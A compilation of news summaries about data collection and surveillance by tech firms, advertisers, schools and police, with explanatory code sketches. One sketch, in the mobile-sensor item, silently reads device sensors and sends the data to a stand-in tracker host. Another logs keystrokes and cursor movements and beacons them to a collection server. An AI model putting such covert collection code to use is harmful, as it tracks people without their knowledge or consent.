Resources

Facebook Has Filed a Patent To Calculate Your Future Location

Facebook has filed several patent applications with the U.S. Patent and Trademark Office for technology that uses your location data to predict where you’re going and when you’re going to be offline.

A May 30, 2017, Facebook application titled “Offline Trajectories” describes a method to predict where you’ll go next based on your location data. The technology described in the patent would calculate a “transition probability based at least in part on previously logged location data associated with a plurality of users who were at the current location.” In other words, the technology could also use the data of other people you know, as well as that of strangers, to make predictions. If the company could predict when you are about to be in an offline area, Facebook content “may be prefetched so that the user may have access to content during the period where there is a lack of connectivity.”
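
To make the quoted phrase concrete, here is a minimal sketch of one way a “transition probability” could be computed from logged location data: a first-order Markov estimate over location trails pooled across many users. Everything below (the type names, the toy trails) is an assumption for illustration, not the patent’s actual method.

```typescript
// Toy illustration of a "transition probability" computed from logged
// location data, in the spirit of the patent's language. All names and
// structures here are assumptions for illustration, not Facebook's code.

type LocationId = string;

// Count transitions between consecutive logged locations across many users.
function buildTransitionCounts(logs: LocationId[][]): Map<string, number> {
  const counts = new Map<string, number>();
  for (const trail of logs) {
    for (let i = 0; i + 1 < trail.length; i++) {
      const key = `${trail[i]}->${trail[i + 1]}`;
      counts.set(key, (counts.get(key) ?? 0) + 1);
    }
  }
  return counts;
}

// P(next | current) = count(current -> next) / count(current -> anything)
function transitionProbability(
  counts: Map<string, number>,
  current: LocationId,
  next: LocationId
): number {
  let total = 0;
  for (const [key, n] of counts) {
    if (key.startsWith(`${current}->`)) total += n;
  }
  const observed = counts.get(`${current}->${next}`) ?? 0;
  return total === 0 ? 0 : observed / total;
}

// Example: trails from three users who all passed through the "office".
const logs = [
  ["home", "office", "gym"],
  ["home", "office", "bar"],
  ["cafe", "office", "gym"],
];
const counts = buildTransitionCounts(logs);
console.log(transitionProbability(counts, "office", "gym")); // 2/3
```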

Another Facebook patent application titled “Location Prediction Using Wireless Signals on Online Social Networks” describes how tracking the strength of Wi-Fi, Bluetooth, cellular, and near-field communication (NFC) signals could be used to estimate your current location, in order to anticipate where you will go next. This “background signal” information is used as an alternative to GPS because, as the patent describes, it may provide “the advantage of more accurately or precisely determining a geographic location of a user.” The technology could learn the category of your current location (e.g., bar or gym), the time of your visit to the location, the hours that entity is open, and the popular hours of the entity.

Yet another Facebook patent application, “Predicting Locations and Movements of Users Based on Historical Locations for Users of an Online System,” further details how location data from multiple people would be used to glean location and movement trends and to model location chains. According to the patent application, these could be used for a “variety of applications,” including “advertising to users based on locations and for providing insights into the movements of users.” The technology could even differentiate movement trends among people who live in a city and who are just visiting a city.


Dutch Government Report Says Microsoft Office Telemetry Collection Breaks EU GDPR Laws

Microsoft broke Euro privacy rules by carrying out the “large scale and covert” gathering of private data through its Office apps, according to a report commissioned by the Dutch government.

The report found that Microsoft was collecting telemetry and other content from its Office applications, including email subject lines and sentences where the translation or spellchecker functions were used, and secretly storing the data on systems in the United States.

Those actions break Europe’s new GDPR privacy safeguards, it is claimed, and may put Microsoft on the hook for potentially tens of millions of dollars in fines. The Dutch authorities are working with the corporation to fix the situation, and are using the threat of a fine as a stick to make it happen.

The investigation was jumpstarted by the fact that Microsoft doesn’t publicly reveal what information it gathers on users, and doesn’t provide an option to turn off the diagnostic and telemetry data that its Office software sends to the company to monitor how well the software is functioning and to identify any issues.


With 5G, you won’t just be watching video. It’ll be watching you, too

What happens when movies can direct themselves? Remember the last time you felt terrified during a horror movie? Take that moment, and all the suspense leading up to it, and imagine it individually calibrated for you. It’s a terror plot morphing in real time, adjusting the story to your level of attention to lull you into a comfort zone before unleashing a personally timed jumpscare.

Or maybe being scared witless isn’t your idea of fun. Think of a rom-com that stops itself from going off the rails when it sees you rolling your eyes. Or maybe it tweaks the eye color of that character finally finding true love so it’s closer to your own, a personalized subtlety to make the love-struck protagonist more relatable.

You can thank (or curse) 5G for that.

When most people think of 5G, they’re envisioning an ultra-fast, high-bandwidth connection that lets you download seasons of your favorite shows in minutes. But 5G’s possibilities go way beyond that, potentially reinventing how we watch video, and opening up a mess of privacy uncertainties.

“Right now you make a video much the same way you did for TV,” Dan Garraway, co-founder of interactive video company Wirewax, said in an interview this month. “The dramatic thing is when you turn video into a two-way conversation. Your audience is touching and interacting inside the experience and making things happen as a result.” The personalized horror flick or tailored rom-com? They would hinge on interactive video layers that use emotional analysis based on your phone’s front-facing camera to adjust what you’re watching in real time. You may think it’s far-fetched, but one of the key traits of 5G is an ultra-responsive connection with virtually no lag, meaning the network and systems would be fast enough to react to your physical responses.

Before you cast a skeptical eye at 5G, consider how the last explosion of mobile connectivity, from 3G to 4G LTE, changed how we consumed video. Being able to watch — and in YouTube’s case, upload — video on a mobile device reimagined how we watch TV and the types of programming that are big business. A decade ago, when Netflix was about two years into its transition from DVD mailings to streaming, its annual revenue was $1.4 billion. This year it’s on track for more than 10 times that ($15.806 billion).

5G’s mobility can bring video experiences to new locations. Spare gives an example straight out of Minority Report: entering a Gap retail store and being greeted by name. But taken further, the store could develop a three-dimensional video concierge for your phone — a pseudo-hologram that helps you find what you’re looking for. With 5G’s ability to make virtual and augmented reality more accessible, you could get a snapshot of what an outfit might look like on you without having to try it on.

Where things get crazy — and creepy — is imagining how 5G enables video to react to your involuntary cues and all the data you unconsciously provide. A show could mimic the weather or time of day to more closely match the atmosphere in real life.

For all the eye-popping possibilities, 5G unleashes a tangle of privacy questions. It could leverage, in real time, every piece of visual information a phone’s front and back cameras can see. This level of visual data collection could pave the way for video interaction that happens completely automatically.

It’s also a potential privacy nightmare. But the lure of billions of dollars has already encouraged companies to make privacy compromises.

And that may make it feel like your personalized horror show is already here.


Now Apps Can Track You Even After You Uninstall Them

If it seems as though the app you deleted last week is suddenly popping up everywhere, it may not be mere coincidence. Companies that cater to app makers have found ways to game both iOS and Android, enabling them to figure out which users have uninstalled a given piece of software lately—and making it easy to pelt the departed with ads aimed at winning them back.

Adjust, AppsFlyer, MoEngage, Localytics, and CleverTap are among the companies that offer uninstall trackers, usually as part of a broader set of developer tools. Their customers include T-Mobile US, Spotify Technology, and Yelp. (And Bloomberg Businessweek parent Bloomberg LP, which uses Localytics.) Critics say they’re a fresh reason to reassess online privacy rights and limit what companies can do with user data.

Uninstall tracking exploits a core element of Apple Inc.’s and Google’s mobile operating systems: push notifications. Developers have always been able to use so-called silent push notifications to ping installed apps at regular intervals without alerting the user—to refresh an inbox or social media feed while the app is running in the background, for example. But if the app doesn’t ping the developer back, the app is logged as uninstalled, and the uninstall tracking tools add those changes to the file associated with the given mobile device’s unique advertising ID, details that make it easy to identify just who’s holding the phone and advertise the app to them wherever they go.
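
The mechanism the article describes boils down to a simple polling loop. The sketch below follows that description under stated assumptions; sendSilentPush and wasAcknowledged are hypothetical stand-ins for a real push-provider integration (APNs or FCM), not any vendor’s actual API.

```typescript
// Sketch of the uninstall-detection logic described above. The helpers
// sendSilentPush and wasAcknowledged are hypothetical stand-ins for a real
// push provider integration (APNs/FCM); this is not any vendor's actual API.

interface Device {
  pushToken: string;
  advertisingId: string; // IDFA / GAID tied to the ad profile
  uninstalled: boolean;
}

declare function sendSilentPush(token: string): Promise<void>;
declare function wasAcknowledged(token: string, withinMs: number): Promise<boolean>;

async function sweepForUninstalls(devices: Device[]): Promise<void> {
  for (const device of devices) {
    // Silent pushes wake the app without showing anything to the user.
    await sendSilentPush(device.pushToken);
    // If the app never pings back, it is presumed uninstalled...
    const alive = await wasAcknowledged(device.pushToken, 24 * 60 * 60 * 1000);
    if (!alive) {
      // ...and the uninstall is written to the advertising-ID profile,
      // ready to be used for "win-back" ad targeting elsewhere.
      device.uninstalled = true;
      console.log(`Flag ${device.advertisingId} for re-engagement ads`);
    }
  }
}
```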

At its best, uninstall tracking can be used to fix bugs or otherwise refine apps without having to bother users with surveys or more intrusive tools. But the ability to abuse the system beyond its original intent exemplifies the bind that accompanies the modern internet, says Jeremy Gillula of the Electronic Frontier Foundation. To participate, users must typically agree to share their data freely, probably forever, not knowing exactly how it may be used down the road. “As an app developer, I would expect to be able to know how many people have uninstalled an app,” he says. “I would not say that, as an app developer, you have a right to know exactly who installed and uninstalled your app.”


Facebook Could Use Data Collected From Its Portal In-Home Video Device To Target You With Ads

Facebook announced Portal last week, its take on the in-home, voice-activated speaker to rival competitors from Amazon, Google and Apple. Last Monday, we wrote: “No data collected through Portal — even call log data or app usage data, like the fact that you listened to Spotify — will be used to target users with ads on Facebook.” We wrote that because that’s what we were told by Facebook executives. But Facebook has since reached out to change its answer: Portal doesn’t have ads, but data about who you call and data about which apps you use on Portal can be used to target you with ads on other Facebook-owned properties.

“Portal voice calling is built on the Messenger infrastructure, so when you make a video call on Portal, we collect the same types of information (i.e. usage data such as length of calls, frequency of calls) that we collect on other Messenger-enabled devices. We may use this information to inform the ads we show you across our platforms. Other general usage data, such as aggregate usage of apps, etc., may also feed into the information that we use to serve ads,” a spokesperson said in an email to Recode. That isn’t very surprising, considering Facebook’s business model. The biggest benefit of Facebook owning a device in your home is that it provides the company with another data stream for its ad-targeting business.


Mobile Websites Can Tap Into Your Phone’s Sensors Without Asking

When apps want to access data from your smartphone’s motion or light sensors, they often make that capability clear. That keeps a fitness app, say, from counting your steps without your knowledge. But a team of researchers has discovered that the rules don’t apply to websites loaded in mobile browsers, which can often access an array of device sensors without any notifications or permissions whatsoever.

That mobile browsers offer developers access to sensors isn’t necessarily problematic on its own. It’s what helps those services automatically adjust their layout, for example, when you switch your phone’s orientation. And the World Wide Web Consortium standards body has codified how web applications can access sensor data. But the researchers—Anupam Das of North Carolina State University, Gunes Acar of Princeton University, Nikita Borisov of the University of Illinois at Urbana-Champaign, and Amogh Pradeep of Northeastern University—found that the standards allow for unfettered access to certain sensors. And sites are using it.

The researchers found that of the top 100,000 sites—as ranked by Amazon-owned analytics company Alexa—3,695 incorporate scripts that tap into one or more of these accessible mobile sensors. That list includes plenty of big names, among them Wayfair, Priceline.com, and Kayak.

“If you use Google Maps in a mobile browser you’ll get a little popup that says, ‘This website wants to see your location,’ and you can authorize that,” says Borisov. “But with motion, lighting, and proximity sensors there isn’t any mechanism to notify the user and ask for permission, so they’re being accessed and that is invisible to the user. For this collection of sensors there isn’t a permissions infrastructure.”
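
The events Borisov refers to are ordinary web APIs. As a rough sketch of what such a script can do, a page (or an ad script it embeds) can subscribe to the motion and orientation streams without triggering any prompt; the report helper and the collection URL below are invented for illustration.

```typescript
// A web page (or an ad script it embeds) can start reading motion and
// orientation sensors with no permission prompt, as the researchers describe.
// (Some browsers have since begun gating these events behind a permission.)

window.addEventListener("devicemotion", (event: DeviceMotionEvent) => {
  const acc = event.accelerationIncludingGravity;
  if (acc) {
    // Raw accelerometer stream, sampled many times per second.
    report({ x: acc.x, y: acc.y, z: acc.z });
  }
});

window.addEventListener("deviceorientation", (event: DeviceOrientationEvent) => {
  // The angle at which the phone is held: alpha/beta/gamma in degrees.
  report({ alpha: event.alpha, beta: event.beta, gamma: event.gamma });
});

// Hypothetical exfiltration helper: ships readings to a collection server.
function report(sample: Record<string, number | null>): void {
  navigator.sendBeacon("https://tracker.example/collect", JSON.stringify(sample));
}
```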

That unapproved access to motion, orientation, proximity, or light sensor data alone probably wouldn’t compromise a user’s identity or device. And a web page can only access sensors as long as a user is actively browsing the page, not in the background. But the researchers note that on a malicious website, the information could fuel various types of attacks, like using ambient light data to make inferences about a user’s browsing, or using motion sensor data as a sort of keylogger to deduce things like PINs.

In past work, researchers have also shown that they can use the unique calibration features of motion sensors on individual devices to identify and track them across websites. And while the World Wide Web Consortium standards classify data from these sensors as “not sensitive enough to warrant specific sensor permission grants,” the group does acknowledge that there are some potential privacy concerns. “Implementations may consider permissions or visual indicators to signify the use of sensors by the page,” the standard suggests.

The prevalence of ad networks also makes it difficult to get a handle on the issue. The researchers even found three scripts attempting to access user sensors in ad modules on WIRED.com, though at least one had been removed when the researchers rechecked the site for this story. Other media sites, including CNN, the Los Angeles Times, and CNET, have ad networks using similar scripts.


Using Wi-Fi To Count People Through Walls

Whether you’re trying to figure out how many students are attending your lectures or how many evil aliens have taken your Space Force brethren hostage, Wi-Fi can now be used to count them all. The system, created by researchers at UC Santa Barbara, uses a single Wi-Fi router outside of the room to measure attenuation and signal drops. From the release: “The transmitter sends a wireless signal whose received signal strength (RSSI) is measured by the receiver. Using only such received signal power measurements, the receiver estimates how many people are inside the room — an estimate that closely matches the actual number. It is noteworthy that the researchers do not do any prior measurements or calibration in the area of interest; their approach has only a very short calibration phase that need not be done in the same area.” This means that you could simply walk up to a wall and press a button to count, with a high degree of accuracy, how many people are walking around. The system can measure up to 20 people in its current form.
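
As a deliberately simplified illustration of the idea (and not the UCSB estimator, which models the blocking and scattering of the signal far more carefully), one could assume each person attenuates the through-wall link by a roughly constant number of decibels and invert that model from RSSI samples; both constants below are invented.

```typescript
// Deliberately simplified toy, not the UCSB estimator: assume each person in
// the room attenuates the through-wall link by roughly the same number of dB,
// and invert that model from RSSI samples.

const EMPTY_ROOM_RSSI_DBM = -40; // baseline with nobody inside (assumed)
const DB_DROP_PER_PERSON = 1.5;  // per-person attenuation (assumed)

function estimateOccupancy(rssiSamples: number[]): number {
  const mean =
    rssiSamples.reduce((sum, s) => sum + s, 0) / rssiSamples.length;
  const drop = EMPTY_ROOM_RSSI_DBM - mean; // total attenuation in dB
  const estimate = Math.round(drop / DB_DROP_PER_PERSON);
  return Math.max(0, Math.min(20, estimate)); // system tops out around 20 people
}

console.log(estimateOccupancy([-49.2, -48.7, -49.5])); // ≈ 6 people
```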


Banks and Retailers Are Tracking How You Type, Swipe and Tap

When you’re browsing a website and the mouse cursor disappears, it might be a computer glitch — or it might be a deliberate test to find out who you are.

The way you press, scroll and type on a phone screen or keyboard can be as unique as your fingerprints or facial features. To fight fraud, a growing number of banks and merchants are tracking visitors’ physical movements as they use websites and apps.

The data collection is invisible to those being watched. Using sensors in your phone or code on websites, companies can gather thousands of data points, known as “behavioral biometrics.”

A phone’s touchscreen sensors can track where and how you swipe your device to help determine who you are.

The angle at which you hold your device is one of the many biometric markers that can be measured.

Behavioral monitoring software churns through thousands of elements to calculate a probability-based guess about whether a person is who they claim. Two major advances have fed its growing use: the availability of cheap computing power and the sophisticated array of sensors now built into most smartphones.

The system’s unobtrusiveness is part of its appeal, Mr. Hanley said. Traditional physical biometrics, like fingerprints or irises, require special scanning hardware for authentication. But behavioral traits can be captured in the background, without customers doing anything to sign up.

BioCatch occasionally tries to elicit a reaction. It can speed up the selection wheel you use to enter data like dates and times on your phone, or make your mouse cursor disappear for a fraction of a second.

“Everyone reacts a little differently to that,” said Frances Zelazny, BioCatch’s chief strategy and marketing officer. “Some people move the mouse side to side; some people move it up and down. Some bang on the keyboard.”

Because your reaction is so individual, it’s hard for a fraudulent user to fake. And because customers never know the monitoring technology is there, it doesn’t impose the kind of visible, and irritating, roadblocks that typically accompany security tests. You don’t need to press your thumb on your phone’s fingerprint reader or type in an authentication code.

Biometric software can also determine the pressure you tend to apply to your phone when you tap and type.

“We don’t have to sit people down in a room and get them to type under perfect laboratory conditions,” said Neil Costigan, the chief executive of BehavioSec, a Palo Alto, Calif., company that makes software used by many Nordic banks. “You just watch them, silently, while they go about their normal account activities.”
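
A minimal sketch of what this kind of silent, browser-side capture can look like follows; the feature fields and the scoring endpoint are assumptions for illustration, not any vendor’s code.

```typescript
// Minimal sketch of browser-side behavioral-biometric capture: keystroke
// dwell times and cursor kinematics, collected silently as the user goes
// about normal activity. Field names and endpoint are assumptions.

const keyDownAt = new Map<string, number>();
const features: Array<Record<string, number>> = [];

document.addEventListener("keydown", (e) => {
  keyDownAt.set(e.code, performance.now());
});

document.addEventListener("keyup", (e) => {
  const down = keyDownAt.get(e.code);
  if (down !== undefined) {
    // Dwell time (how long a key is held) is one classic biometric marker.
    features.push({ dwellMs: performance.now() - down });
    keyDownAt.delete(e.code);
  }
});

document.addEventListener("mousemove", (e) => {
  // Cursor position over time yields speed, jitter, and curvature.
  features.push({ x: e.clientX, y: e.clientY, t: performance.now() });
});

// Periodically ship the batch to a scoring service for a probability-based
// guess about whether the person is who they claim to be.
setInterval(() => {
  if (features.length > 0) {
    navigator.sendBeacon("https://biometrics.example/score", JSON.stringify(features));
    features.length = 0;
  }
}, 5000);
```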


Google tracks you even if you tell it not to

Google wants to know where you go so badly that it records your movements even when you explicitly tell it not to. An Associated Press investigation found that many Google services on Android devices and iPhones store your location data even if you’ve used privacy settings that say they will prevent it from doing so.

An app like Google Maps will remind you to allow access to location if you use it for navigating. If you agree to let it record your location over time, Google Maps will display that history for you in a “timeline” that maps out your daily movements. Storing your minute-by-minute travels carries privacy risks and has been used by police to determine the location of suspects — such as a warrant that police in Raleigh, North Carolina, served on Google last year to find devices near a murder scene. So the company will let you “pause” a setting called Location History. Google says that will prevent the company from remembering where you’ve been. Google’s support page on the subject states: “You can turn off Location History at any time. With Location History off, the places you go are no longer stored.” That isn’t true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking.

For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are. And some searches that have nothing to do with location, like “chocolate chip cookies,” or “kids science kits,” pinpoint your precise latitude and longitude — accurate to the square foot — and save it to your Google account. The privacy issue affects some two billion users of devices that run Google’s Android operating software and hundreds of millions of iPhone users worldwide who rely on Google for maps or search.


Digital ads are starting to feel psychic

It seems like everyone these days has had a paranoiac moment where a website advertises something you recently purchased or were gifted, despite there being no digital trail. According to a new website called New Organs, which collects first-hand accounts of these moments, “the feeling of being listened to is among the most common experiences, along with seeing the same ads on different websites, and being tracked via geo-location,” reports The Outline. The website was created by Tega Brain and Sam Lavigne, two Brooklyn-based artists whose work explores the intersections of technology and society…


How Smart TVs in Millions of US Homes Track More Than What’s on Tonight

The growing concern over online data and user privacy has been focused on tech giants like Facebook and devices like smartphones. But people’s data is also increasingly being vacuumed right out of their living rooms via their televisions, sometimes without their knowledge. From a report:

In recent years, data companies have harnessed new technology to immediately identify what people are watching on internet-connected TVs, and then use that information to send targeted advertisements to other devices in their homes. Marketers, forever hungry to get their products in front of the people most likely to buy them, have eagerly embraced such practices. But the companies watching what people watch have also faced scrutiny from regulators and privacy advocates over how transparent they are being with users.

Samba TV is one of the bigger companies that track viewer information to make personalized show recommendations. The company said it collected viewing data from 13.5 million smart TVs in the United States, and it has raised $40 million in venture funding from investors including Time Warner, the cable operator Liberty Global and the billionaire Mark Cuban. Samba TV has struck deals with roughly a dozen TV brands — including Sony, Sharp, TCL and Philips — to place its software on certain sets. When people set up their TVs, a screen urges them to enable a service called Samba Interactive TV, saying it recommends shows and provides special offers “by cleverly recognizing onscreen content.” But the screen, which contains the enable button, does not detail how much information Samba TV collects to make those recommendations…. Once enabled, Samba TV can track nearly everything that appears on the TV on a second-by-second basis, essentially reading pixels to identify network shows and ads, as well as programs on Netflix and HBO and even video games played on the TV.
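
“Reading pixels” to identify content is typically done by fingerprinting frames and matching them against a reference database. The toy sketch below shows that idea in miniature; real ACR systems are far more robust, and every name and threshold here is an assumption.

```typescript
// Toy sketch of automated content recognition (ACR): fingerprint a
// downsampled frame and look it up in a reference database. Everything
// named here is an assumption for illustration.

// Reduce a frame (grayscale, 8x8 = 64 pixels) to a compact fingerprint:
// one bit per pixel, set when the pixel is brighter than the frame's mean.
function fingerprint(pixels: number[] /* 64 grayscale values, 0-255 */): bigint {
  const mean = pixels.reduce((s, p) => s + p, 0) / pixels.length;
  let bits = 0n;
  for (const p of pixels) {
    bits = (bits << 1n) | (p > mean ? 1n : 0n);
  }
  return bits;
}

// Hamming distance between fingerprints: small distance = likely same content.
function distance(a: bigint, b: bigint): number {
  let x = a ^ b;
  let count = 0;
  while (x > 0n) {
    count += Number(x & 1n);
    x >>= 1n;
  }
  return count;
}

// Match the on-screen frame against a database of known shows and ads.
function identify(frame: number[], db: Map<string, bigint>): string | null {
  const fp = fingerprint(frame);
  for (const [title, ref] of db) {
    if (distance(fp, ref) < 10) return title; // threshold is an assumption
  }
  return null;
}
```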


Facebook, Google, and Microsoft Use Design to Trick You Into Handing Over Your Data, New Report Warns

A study from the Norwegian Consumer Council dug into the underhanded tactics used by Microsoft, Facebook, and Google to collect user data. “The findings include privacy intrusive default settings, misleading wording, giving users an illusion of control, hiding away privacy-friendly choices, take-it-or-leave-it choices, and choice architectures where choosing the privacy friendly option requires more effort for the users,” states the report, which includes images and examples of confusing design choices and strangely worded statements involving the collection and use of personal data.

Google makes opting out of personalized ads more of a chore than it needs to be and uses multiple pages of text, unclear design language, and, as described by the report, “hidden defaults” to push users toward the company’s desired action. “If the user tried to turn the setting off, a popup window appeared explaining what happens if Ads Personalization is turned off, and asked users to reaffirm their choice,” the report explained. “There was no explanation about the possible benefits of turning off Ads Personalization, or negative sides of leaving it turned on.” Those who wish to completely avoid personalized ads must traverse multiple menus, making that “I agree” option seem like the lesser of two evils.

In Windows 10, if a user wants to opt out of “tailored experiences with diagnostic data,” they have to click a dimmed lightbulb, while the symbol for opting in is a brightly shining bulb, says the report.

Another example has to do with Facebook. The social media site makes the “Agree and continue” option much more appealing and less intimidating than the grey “Manage Data Settings” option. The report says the company-suggested option is the easiest to use. “This ‘easy road’ consisted of four clicks to get through the process, which entailed accepting personalized ads from third parties and the use of face recognition. In contrast, users who wanted to limit data collection and use had to go through 13 clicks.”


MIT’s AI Can Track Humans Through Walls With Just a Wifi Signal

Researchers at the Massachusetts Institute of Technology have developed a new piece of software that uses wifi signals to monitor the movements, breathing, and heartbeats of humans on the other side of walls. While the researchers say this new tech could be used in areas like remote healthcare, it could in theory be used in more dystopian applications.

“We actually are tracking 14 different joints on the body […] the head, the neck, the shoulders, the elbows, the wrists, the hips, the knees, and the feet,” Dina Katabi, an electrical engineering and computer science teacher at MIT, said. “So you can get the full stick-figure that is dynamically moving with the individuals that are obstructed from you — and that’s something new that was not possible before.” The technology works a little bit like radar, but to teach their neural network how to interpret these granular bits of human activity, the team at MIT’s Computer Science and Artificial Intelligence Laboratory (CSAIL) had to create two separate A.I.s: a student and a teacher.

The team developed one A.I. program that monitored human movements with a camera, on one side of a wall, and fed that information to their wifi X-ray A.I., called RF-Pose, as it struggled to make sense of the radio waves passing through that wall on the other side. The research builds off of a longstanding project at CSAIL led by Katabi, which hopes to use this wifi tracking to passively monitor the elderly and automatically alert EMTs and medical professionals if they fall or suffer some other injury.
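
Structurally, this is teacher-student training across modalities: the camera-based model labels synchronized frames, and the RF model learns to reproduce those labels from radio data alone. The sketch below shows only the shape of that loop; the interfaces and the trainStep call are hypothetical, not MIT’s code.

```typescript
// Structural sketch of the teacher-student setup described above: a camera-
// based pose estimator (teacher) labels synchronized frames, and the RF
// network (student) learns to predict the same keypoints from radio data
// alone. Types and trainStep are hypothetical, not MIT's code.

interface Keypoint { x: number; y: number }           // one of 14 body joints
type Pose = Keypoint[];

interface Teacher {
  estimatePose(cameraFrame: Uint8Array): Pose;        // vision model
}

interface Student {
  predictPose(rfHeatmap: Float32Array): Pose;         // RF model being trained
  trainStep(rfHeatmap: Float32Array, target: Pose): number; // returns loss
}

// Each training example pairs a camera frame with the RF measurement taken
// at the same instant, so the teacher's output can supervise the student.
function train(
  teacher: Teacher,
  student: Student,
  pairs: Array<{ camera: Uint8Array; rf: Float32Array }>
): void {
  for (const { camera, rf } of pairs) {
    const target = teacher.estimatePose(camera); // "ground truth" labels
    const loss = student.trainStep(rf, target);  // fit RF -> pose mapping
    console.log(`loss=${loss.toFixed(4)}`);
  }
  // Once trained, the student needs no camera: predictPose(rf) works
  // through walls, where the teacher cannot see.
}
```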

The Massachusetts Institute of Technology lab behind the innovation has previously received funding from the Pentagon’s Defense Advanced Research Projects Agency (DARPA), and one of the researchers has presented work at a security research symposium curated by a C-suite member of In-Q-Tel, the CIA’s high-tech venture capital firm.


Google plan for data-driven ‘smart city’ sparks privacy, democracy concerns

In the Canadian city of Toronto, city officials are negotiating a project that will give a section of the city’s waterfront to the US tech giant Google. Under the arrangement, Google affiliate Sidewalk Labs will build and run a high-tech “radical mixed-use” site called Quayside. This “smart city” plan involves creating a neighbourhood “from the internet up”, powered and served by data, with sensors monitoring everything from air quality to pedestrian traffic, even the flushing of toilets. Amenities like garbage disposal and goods delivery are to be coordinated and driven by AI and robotics.

The proposed parcel of land isn’t huge, but it’s not insubstantial either – it covers about half-a-square-kilometre, and there are already suggestions it could be extended.

For Eric Schmidt, executive chairman of Alphabet — the parent company of both Google and Sidewalk Labs — it’s the culmination of a long-held ambition.

“Give us a city and put us in charge,” he once famously declared.

Following the Facebook/Cambridge Analytica scandal, some, like Dr Jathan Sadowski at the University of Sydney, worry about the implications of putting a private tech company in charge of both urban development and urban life.

“What’s in it for them? It’s data,” he says. “It allows them to get really massive amounts of granular data about urban life and urban environments.”

“You’ll have a city that’s based on, or built around, proprietary platforms, data harvesting, corporate control.”


Targeted advertising hits emergency rooms

Patients sitting in emergency rooms, at chiropractors’ offices and at pain clinics in the Philadelphia area may start noticing on their phones the kind of messages typically seen along highway billboards and public transit: personal injury law firms looking for business by casting mobile online ads at patients.

The potentially creepy part? They’re only getting fed the ad because somebody knows they are in an emergency room.

The technology behind the ads, known as geofencing, or placing a digital perimeter around a specific location, has been deployed by retailers for years to offer coupons and special offers to customers as they shop. Bringing it into health care spaces, however, is raising alarm among privacy experts.
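
At its core, a geofence is exactly that digital perimeter: a point-in-radius test against a known location. A minimal sketch, with invented coordinates:

```typescript
// A geofence at its core: a point-in-radius test against a digital perimeter.
// Coordinates below are invented for illustration.

const EARTH_RADIUS_M = 6371000;

// Haversine great-circle distance between two lat/lng points, in meters.
function distanceMeters(lat1: number, lng1: number, lat2: number, lng2: number): number {
  const toRad = (d: number) => (d * Math.PI) / 180;
  const dLat = toRad(lat2 - lat1);
  const dLng = toRad(lng2 - lng1);
  const a =
    Math.sin(dLat / 2) ** 2 +
    Math.cos(toRad(lat1)) * Math.cos(toRad(lat2)) * Math.sin(dLng / 2) ** 2;
  return 2 * EARTH_RADIUS_M * Math.asin(Math.sqrt(a));
}

interface Geofence { lat: number; lng: number; radiusM: number; label: string }

// An ad platform checks each incoming device location against its fences and,
// on a hit, marks the device as eligible for that fence's ad campaign.
function matchFence(lat: number, lng: number, fences: Geofence[]): Geofence | null {
  return fences.find(f => distanceMeters(lat, lng, f.lat, f.lng) <= f.radiusM) ?? null;
}

const fences = [{ lat: 39.9496, lng: -75.1570, radiusM: 100, label: "ER waiting room" }];
console.log(matchFence(39.9497, -75.1571, fences)?.label); // "ER waiting room"
```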


Facebook accused of conducting mass surveillance through its apps

Facebook used its apps to gather information about users and their friends, including some who had not signed up to the social network, reading their text messages, tracking their locations and accessing photos on their phones, a court case in California alleges.

The claims of what would amount to mass surveillance are part of a lawsuit brought against the company by the former startup Six4Three, listed in legal documents filed at the superior court in San Mateo as part of a court case that has been ongoing for more than two years.

It alleges that Facebook used a range of methods, some adapted to the different phones that users carried, to collect information it could use for commercial purposes.

“Facebook continued to explore and implement ways to track users’ location, to track and read their texts, to access and record their microphones on their phones, to track and monitor their usage of competitive apps on their phones, and to track and monitor their calls,” one court document says.

But all details about the mass surveillance scheme have been redacted at Facebook’s request in Six4Three’s most recent filings. Facebook claims these are confidential business matters.

Other alleged projects included one to remotely activate Bluetooth, allowing the company to pinpoint a user’s location without them explicitly agreeing to it. Another involved the development of privacy settings with an early end date that was not flagged to users, letting them expire without notice, the court documents claim.

Facebook admitted recently that it had collected call and text message data from users, but said it only did so with prior consent. However, the Guardian has reported that it logged some messages without explicitly notifying users. The company could not see text messages for iPhone users but could access any photos taken on a phone or stored on the built-in “camera roll” archive system, the court case alleged. Facebook has not disclosed how those photos were analysed.

Facebook has not fully disclosed the manner in which it pre-processes photos on the iOS camera roll, meaning if a user has any Facebook app installed on their iPhone, then Facebook accesses and analyses the photos the user takes and/or stores on the iPhone, the complainant alleges.


New York high school will use CCTV and facial recognition to enforce discipline

Next year, high schools in Lockport, New York, will use the “Aegis” CCTV and facial recognition system to track and record the interactions of students suspected of code of conduct violations, keeping a ledger of who speaks to whom, where, and for how long.

The record will be used to assemble evidence against students and to identify possible accomplices to whom guilt can also be ascribed.

Lockport Superintendent Michelle T. Bradley justified the decision by noting, “We always have to be on our guard. We can’t let our guard down.”

Lockport will be the first school district in the world to subject its students to this kind of surveillance. The program will cost $1.4m in state money. The technology supplier is SN Technologies of Gananoque, Ont., one of the companies in the vicinity of Kingston, Ontario, home to the majority of the province’s detention centers.

The Lockport district says that the system will make students safer by alerting officials if someone on a sex-offender registry or terrorist watchlist enters the property. None of America’s school shootings or high-profile serial sex abuse scandals were carried out by wanted terrorists or people on the sex-offender registry.

Deployed law-enforcement facial recognition systems have failure rates of 98%. The vendor responsible for Aegis would not disclose how they improved on the state of the art, but insisted that their product worked “99.97% of the time.” The spokesperson would not disclose any of the workings of the system, seemingly believing that doing so was antithetical to security.


London cops are using an unregulated, 98% inaccurate facial recognition tech

The London Metropolitan Police use a facial recognition system whose alerts have a 98% false positive rate; people falsely identified by the system are stopped, questioned and treated with suspicion.

The UK has a biometrics commissioner, Professor Paul Wiles, who laments the lack of any regulation of this technology, calling it “urgently needed”; these regulations are long promised, incredibly overdue, and the Home Office admits that they’re likely to be delayed beyond their revised June publication date.

The Met say that they don’t “arrest” people who are erroneously identified by the system. Rather, they “detain” them by refusing to allow them to leave and subjecting them to searches, etc.

Incredibly, the Met’s system is even worse than the South Wales Police’s facial recognition system, which has a comparatively impressive 92% failure rate.


Why the Facebook ‘scandal’ impacts you more than you think

It’s not just the data you choose to share.

By now we all know the story: Facebook allowed apps on its social media platform which enabled a shady outfit called Cambridge Analytica to scrape the profiles of 87 million users, in order to serve up targeted ads to benefit the Trump election campaign in 2016.  More than 300,000 Australian users of Facebook were caught up in the data harvesting.

But serving up ads in a foreign election campaign is not the whole story.  Facebook, and other companies involved in data mining, are invading our privacy and harming us economically and socially, in ways that are only just starting to become clear.

